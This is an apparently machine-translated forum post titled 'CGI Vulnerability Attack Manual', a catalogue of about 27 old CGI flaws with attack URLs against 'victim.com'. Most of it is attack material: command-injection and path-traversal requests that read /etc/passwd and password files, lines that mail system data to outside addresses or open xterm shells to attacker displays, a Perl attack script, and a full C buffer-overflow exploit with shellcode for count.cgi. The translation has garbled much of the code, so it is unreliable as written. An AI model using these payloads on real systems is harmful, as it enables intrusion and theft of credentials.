CGI Vulnerability Attack Manual

xiaoxiao2021-03-06 43

I saw the article written by Bamboo in the forum. I wanted to expand him. I have been going to improve some put it up, but I have not tried all vulnerabilities with time. I think there is so much in the forum. Comrades will be perfect, name the CGI Vulnerability Attack Manual Version-0.02 (upgraded Bamboo), is designed to throw the jade, welcome to revise, increase ... more welcome to spread anything. :)

I. PHF vulnerability

This PHF vulnerability seems to be the most classic, almost all articles will introduce, can execute the server's command, such as display / etc / passwd:

Lynx http://www.victim.com/cgi-bin/phf?qalias=x /bin/cat /etc/passwd

But can we find it?

Second. PHP.CGI 2.0Beta10 or earlier version of the vulnerability

You can read all files of Nobody privileges.

Lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

PHP.CGI version 2.1 can only read the SHTML file.

For password files, comrades should pay attention to it, maybe in /etc/master.passwd ,/etc/security/passwd, etc.

Three. Whois_raw.cgi

Lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn= cat /etc/passwd

Lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn= /USR/X11R6/bin/

xterm% 20-Display% 20Graziella.lame.org: 0

FAXSURVEY

Lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat /etc/passwd

5. TextCounter.pl

If there is TextCounter.pl on the server, everyone can execute commands with the permission of the HTTP daemon.

#! / usr / bin / perl

$ URL = 'http://dtp.kappa.ro/a/test.shtml'; # please _do_ _modify_ this

$ Email = 'pdoru @ pop3.kappa.ro, root'; # please _do_ _modify_ this

IF ($ ARGV [0]) {$ cmd = $ argv [0];} else {

$ Cmd = "(ps ax; cd ..; cd ..; cd ..; cd etc; catch; set) / | mail $ {email}

-SANONOTHERE_ONE

} $ text = "$ {url} /; = / 8; $ {cmd}; echo |"; $ text = ~ s / // $ / {ified /} / g; #print

"$ text / n";

System ({"Wget"} "wget", $ text, "-o / dev / null");

#System ({"{" lynx "}" lynx ", $ text); # If there is no WGET command, you can also use Lynx

#System ({"Lynx"} "Lynx", $ text);

Six. Some versions (1.1) info2www vulnerabilities

$ Request_method = get ./info2www '(../../../../../..../bin/mail jami

You Have New Mail.

I don't quite understand it. :(

7. pfdispaly.cgi

Lynx -source /'Http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../etc/motd '

PfDisplay.cgi also has another vulnerability to execute a command

Lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi? '% 0a / bin / uname% 20-a |'

oral

Lynx-Dump /

http://victim/cgi-bin/pfdispaly.cgi? '% 0A / USR / BIN / X11 / XCLOCK% 20-Display% 20evil: 0.0 |'

Eight. WRAP

Lynx http://www.victim.com/cgi-bin/Wrap?/../../../..-tc

Nine. WWW-SQL

You can let you read some restricted pages such as:

Enter: http://your.server/protected/something.html: http://your.server/protected/something.html:

Be required to enter an account and password. And WWW-SQL doesn't have to:

http://your.server/cgi-bin/www-sql/protected/something.html:

Ten. View-Source

Lynx

http://www.victim.com/cgi-bin/view-source?../../../..../../../etc/passwd

11.campas

Lynx http://www.victim.com/cgi-bin/campas? cat /etc/passwd

Twelve .webgais

Telnet www.victim.com 80

Post / cgi-bin / WebGais HTTP / 1.0

Content-Length: 85 (Replace this with the actual length of the

"Exploit" Line)

Query = '; mail drazvan/@pop3.kappa.ro

Thirteen .websendmail

Telnet www.victim.com 80

Post / CGI-BIN / Websendmail HTTP / 1.0

Content-Length: XXX (SHOULD BE Replaced with The Actual Length of The Actual Length of The

String Passed to the Server, in this case xxx = 90)

Receiver =; mail your_address/@somewhere.org

14.handler

Telnet www.victim.com 80

Get / cgi-bin / handler / useless_shit; cat /etc/passwd|?data=downloadhttp/1.0

oral

Get / cgi-bin / handler / blah; xwsh -display yourost.com |? Data = download

oral

Get

/ cgi-bin / handler / ; xterm -display Danish: 0 -e / bin / sh | ? Data = DOWNLOAD

Note that CAT is the Tab key instead of space, the server will not open Useless_shit, but still execute the following command. 15.Test-CGI

Lynx http://www.victim.com/cgi-bin/test-cgi?/whatever

CGI / 1.0 Test Script Report:

Argc IS 0. argv is.

Server_software = ncsa / 1.4b

Server_name = Victim.com

Gateway_Interface = CGI / 1.1

Server_Protocol = HTTP / 1.0

Server_port = 80

Request_method = Get

HTTP_ACCEPT = TEXT / Plain, Application / X-HTML, Application / HTML,

TEXT / HTML, TEXT / X-HTML

PATH_INFO =

Path_translated =

Script_name = / cgi-bin / Test-CGI

Query_String = WhatVER

Remote_host = fiffh.column.gov

REMOTE_ADDR = 200.200.200.200

REMOTE_USER =

Auth_type =

Content_type =

Content_length =

Get some HTTP directory

Lynx http://www.victim.com/cgi-bin/test-cgi?/help&0a/bin/cat /etc/passwd

This trick is not used. :(

Lynx http://www.victim.com/cgi-bin/nph-test-cgi? /*

Can also try this way

GET / CGI-BIN / TEST-CGI? * HTTP / 1.0

GET / CGI-BIN / TEST-CGI? X *

GET / CGI-BIN / NPH-TEST-CGI? * HTTP / 1.0

GET / CGI-BIN / NPH-TEST-CGI? X *

GET / CGI-BIN / TEST-CGI? X http / 1.0 *

GET / CGI-BIN / NPH-TEST-CGI? X http / 1.0 *

16. Apache for some BSDs:

Lynx http://www.victim.com/root/etc/passwd

Lynx http://www.victim.com/~root/etc/passwd

Seventeen.htmlscript

Lynx http://www.victim.com/cgi-bin/htmlscript?../../...... ketc/passwd

Eighth eight .jj.c

The demo cgi program jj.c calls / bin / mail without filtering user

Input, So Any Programd on Jj.c Could Potentially Be ExploIited By

SIMPLY A FOLLOWED BY A UNIX Command. It May Require A

Password, but two known passwords include httpdrocks and sdgrocks. if

You Can Retrieve A Copy of The Compiled Program Running Strings on IT

Will Probably Reveil The Password.

Do a web search on jj.c to get a copy and study the code yourself

You have more quintions.

19. If you read http://www.victim.com/_vti_inf.html you will get the version of FP Extensions

And it on the server. There are also some password files such as:

http://www.victim.com/_vti_pvt/service.pwd

http://www.victim.com/_vti_pvt/Users.pwd

http://www.victim.com/_vti_pvt/authors.pwd

http://www.victim.com/_vti_pvt/administrators.pwd

Twenty .freestats.com CGI

I have never encountered, some places that I don't have to make mistakes, so I'm directly attached.

John Carlton Found Following. He Developed An Explloit for THE

Free Web Stats Services Offered AT FreeStats.com, and Supplied THE

Webmaster with property code to patch the bug.

Start An Account with FreeStats.com, And Log in. Click on The

Area That Says "Click Here to Edit your User Profile & Counter

Info "this Will Call Up a file caled edit.pl with your user

And Password Included in it. save this file to your hard disk and

Open it with notepad. The only form of security in this is a

Hidden Attribute on the form element of your account number.

Change this from

* Input Type = Hidden Name = Account value = Your # *

* INPUT TYPE = TEXT NAME = Account Value = "" *

Save Your page and load it ITO Your Browser. Their will now be a

Text Input Box Where The Hidden Element Was Before. SIMPLY TYPE A

# in and push the "Click Here to Update User Profile" and all the

Information That Appears ON Your Screen Has Now Been Written To

That User profile.

But That isn't the Worst of it. By using frames (2 frames, one to

Hold this page You Just Made, and one as a target for the Form

Submission) You CHANGE The Password on All of their Accounts

WITH A Simple JavaScript Function.

Deep Inside the Web Site Authors Still Have The Good Old "Edit.pl"

Script. it (unlike the path described)

But you can reach it Directly at: http://www.siteTracker.com/cgi-bin/edit.pl? Account = & password =

Twenty-one .vulnerability in Glimpse HTTP

Telnet target.machine.com 80

Get

/ci-bin/aglimpse/80||=5;cmd=5mail5fyodor/@dhp.com/

HTTP / 1.0

Twenty-two.count.cgi

This program is only valid for count.cgi 24:

/ * ### count.c ########################################################################################################################################################################################################################################################################################## ############## * /

#include

/ * Forwards * /

Unsigned long getsp (int);

INT usage (char *);

Void DOIT (Char *, Long, Char *);

/ * Constants * /

Char shell [] =

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90" "" "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 "

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ XEB / X3C / X5E / X31 / XC0 / X89 / XF1 / X8D / X5E / X18 / X88 / X46 / X2C / X88 / X46 / X30"

"/ x88 / x46 / x4b / x8d / x56 / x20 / x89 / x16 / x8d / x56 / x2d / x89 / x56"

"/ x04 / x8d / x56 / x08 / x8d / x56 / x3a / x89 / x56 / x0c / x8d / x56 / x10"

"/ x89 / x46 / x10 / xb0 / x0b / xcd / x80 / x31 / xdb / x89 / xd8 / x40 / xcd / x80 / xe8 / xbf"

"/ XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF"

"/ XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF"

"/ usr / x11r6 / bin / xterm0-ut0-display0";

Char endpad [] =

"/ XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF"

"/ XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF / XFF";

INT Main (int Argc, char * argv []) {

Char * shellcode = null;

INT CNT, Ver, Retcount, Dispnum, Dotquads [4], Offset

UNSIGNED Long SP;

Char Dispname [255];

Char * host;

OFFSET = SP = CNT = VER = 0;

FPRINTF (stderr, "/ t% s - gus / n", argv [0]);

IF (Argc <3) USAGE (Argv [0]);

While (CNT = Getopt (Argc, Argv, "H: D: V: o:"))! = EOF) {switch (cnt) {

Case 'h':

Host = OPTARG;

Break;

Case 'd':

{

Retcount = SSCANF (OPTARG, "% d.% d.% d.% d:% d",

& dotquads [0],

& dotquads [1],

& dotquads [2],

& dotquads [3], & dispnum);

IF (Retcount! = 5) USAGE (Argv [0]);

Sprintf (Dispname, "% 03D.% 03d.% 03d.% 03d:% 01d",

Dotquads [0], Dotquads [1], Dotquads [2], Dotquads [3], DISPNUM;

Shellcode = malloc (Strlen) Strlen (shell) strlen (endpad);

Sprintf (Shellcode, "% S% S% S% S", Shell, Dispname, Endpad;

}

Break;

Case 'V':

Ver = ATOI (OPTARG);

Break;

Case 'o':

OFFSET = ATOI (OPTARG);

Break;

DEFAULT:

USAGE (Argv [0]);

Break;

}

Sp = Offset getsp (Ver);

(void) DOIT (Host, SP, Shellcode);

exit (0);

}

Unsigned long getsp (int ver) {

/ * Get The Stack Pointer We Should Be Using. YMMV. If IT Does Not Work,

TRY USING -O X, WHERE X IS BETWEEN-1500 and 1500 * /

Unsigned long sp = 0;

IF (Ver == 15) sp = 0xBFFFEA50;

IF (Ver == 20) sp = 0xBFFFEA50;

IF (Ver == 22) sp = 0xBFFFEAB4;

IF (ver == 23) sp = 0xBffFee38; / * Dunno About this one * /

IF (sp == 0) {

FPRINTF (stderr, "I don't have, one, us, usding the -o

Option./N ");

FPRINTF (stderr, "Versions Above 24 Are Patched for this bug./N");

Exit (1);

} else {

Return SP;

}

INT usage (char * name) {

FPRINTF (stderr, "/ tusage:% s -h host -d -v [-o

] / N ", Name);

FPRINTF (stderr, "/ te.g.% s -h www.foo.bar -d 127.0.0.1:0 -V 22 / n", name);

Exit (1);

}

INT OpenHost (Char * Host, INT port) {

Int Sock;

Struct Hostent * He; struct sockaddr_in sa;

He = gethostbyname (Host);

IF (he == NULL) {

PERROR ("Bad Hostname / N");

EXIT (-1);

}

Memcpy (& sa.sin_addr, he-> h_addr, he-> h_length);

sa.sin_port = htons (port);

sa.sin_family = af_inet;

SOCK = Socket (AF_INET, SOCK_STREAM, 0);

IF (SOCK <0) {

Perror ("Cannot Open Socket";

EXIT (-1);

}

Bzero (& sa.sin_zero, sizeof (sa.sin_zero);

IF (Connect (STRUCK, STRUCKADDR *) & SA, SIZEOF SA) <0) {

Perror ("Cannot Connect To Host";

EXIT (-1);

}

Return (SOCK);

}

Void DOIT (Char * Host, Long SP, Char * shellcode) {

INT CNT, SOCK;

Char QS [7000];

Int bufsize = 16;

Char buf [buffsize];

Char chain [] = "User = a";

Bzero (BUF);

For (CNT = 0; CNT <4104; CNT = 4) {

QS [CNT 0] = SP & 0x000000FF;

QS [CNT 1] = (SP & 0x0000FF00) >> 8;

QS [CNT 2] = (SP & 0x00FF0000) >> 16;

QS [CNT 3] = (SP & 0xFF000000) >> 24;

}

STRCPY (QS, Chain);

Qs [strlen] = 0x90;

QS [4104] = SP & 0x000000FF;

QS [4105] = (SP & 0x0000FF00) >> 8;

QS [4106] = (SP & 0x00FF0000) >> 16;

QS [4107] = (SP & 0xFF000000) >> 24;

QS [4108] = SP & 0x000000FF;

QS [4109] = (SP & 0x0000FF00) >> 8;

QS [4110] = (SP & 0x00FF0000) >> 16;

Qs [4111] = (SP & 0xFF000000) >> 24;

QS [4112] = SP & 0x000000FF;

QS [4113] = (SP & 0x0000FF00) >> 8;

QS [4114] = (sp & 0x00ff0000) >> 16;

QS [4115] = (SP & 0xFF000000) >> 24;

QS [4116] = SP & 0x000000FF;

QS [4117] = (sp & 0x0000FF00) >> 8;

QS [4118] = (sp & 0x00ff0000) >> 16;

QS [4119] = (SP & 0xFF000000) >> 24;

QS [4120] = SP & 0x000000FF; QS [4121] = (SP & 0x0000FF00) >> 8;

QS [4122] = (SP & 0x00FF0000) >> 16;

QS [4123] = (SP & 0xFF000000) >> 24;

QS [4124] = SP & 0x000000FF;

QS [4125] = (SP & 0x0000FF00) >> 8;

QS [4126] = (SP & 0x00FF0000) >> 16;

QS [4127] = (SP & 0xFF000000) >> 24;

QS [4128] = SP & 0x000000FF;

QS [4129] = (SP & 0x0000FF00) >> 8;

QS [4130] = (sp & 0x00ff0000) >> 16;

QS [4131] = (SP & 0xFF000000) >> 24;

STRCPY (CHAR *) & QS [4132], Shellcode;

SOCK = OpenHost (Host, 80);

Write (SOCK, "Get /ci-bin/count.cgi?";

Write (SOCK, QS, STRLEN (QS));

Write (SOCK, "HTTP / 1.0 / N", 10);

Write (SOCK, "User-Agent:", 12);

Write (SOCK, QS, STRLEN (QS));

Write (SOCK, "/ N / N", 2);

Sleep (1);

/ * Printf ("Get /cgi-bin/count.cgi?% HTTP / 1.0 / NUSER-Agent:% S / N / N", QS, QS)

* /

/ *

STENV ("http_user_agent", qs, 1);

STENV ("Query_String", QS, 1);

SYSTEM ("./ count.cgi");

* /

}

Look at the picture with count.cgi

Http://attacked.host.com/cgi-bin/count.cgi?display=image&image=../../../../../path_to_gif/file.gif

Twenty-three .finger.cgi

Lynx http://www.victim.com/cgi-bin/finger?@localhost

Get the username on the host.

Twenty-four .man.sh

Robert Moniot Found Followung. The May 1998 Issue of Sysadmin

Magazine Contains An Article, "Web-enabled Man Pages", Which

Includeds Source Code for Very Nice CGI script named man.sh to feed

Man Pages TO A Web Browser. The Hypertext Links To Other Man

Pages Are an especially attractive feature.

Unfortunately, this script is vulnerable to attack. Essential,

Anyone Who Can Execute The CGI thru Their Web Browser Can Run Any

System Commands with the user id of the web server and obtain the

Output from Them in A Web Page.

Twenty-five.formhandler.cgi

Plus in the form

Value = "text: / tmp /../ etc / passwd">

There is / etc / passwd in your mailbox

Twenty-six.jfs

I believe that everyone has seen "JFS invading the PCWEEK-Linux host details" this article, he uses Photoads

This CGI module has an actual attack. I don't have actual attacks, seeing the understanding of the article is like this.

First Lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?

Adnum=31337 &ction=done&country=la&city=lele&State=a&email=lala@hjera.com&name=%

0a11111111111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111 & phone = 11 & SUBJECT = La & Pa

SSWORD = 0 & CityStphone = 0 & rented = 0 "Create a new AD value after the check is over $ adnum

Lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?

File = a.jpg & adunum = 11111111111111111111111111111111111111111111111111111111111111

1111111111111111111111111111111111111111111111111111111111111111111111111111111111

111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111) & data = 1 & password = 0 & file

_Content =% 00% 00% 00% 00% 00% 00% 00% 00% 00% 00 & File_Name = / lala /

/../../../../..../../home/httpd/html/photoads/cgi-bin/advisory.cgi.gif '

Create / override users Nobody to have the right to write any files.

I don't know if my understanding is correct, I can't find the to_URL script in its zip package, I don't know which comrand know?

Twenty-seventh. Backdoor

Seeing that some cgichk.c has check Tuma unlg1.1 and rwwwshell.pl

The previous one is written in unlg, I have not seen the source code, there is a THC written, and there is a source code of 1.6 version in PacketStorm.

转载请注明原文地址:https://www.9cbs.com/read-45236.html

9cbs

New Post(0)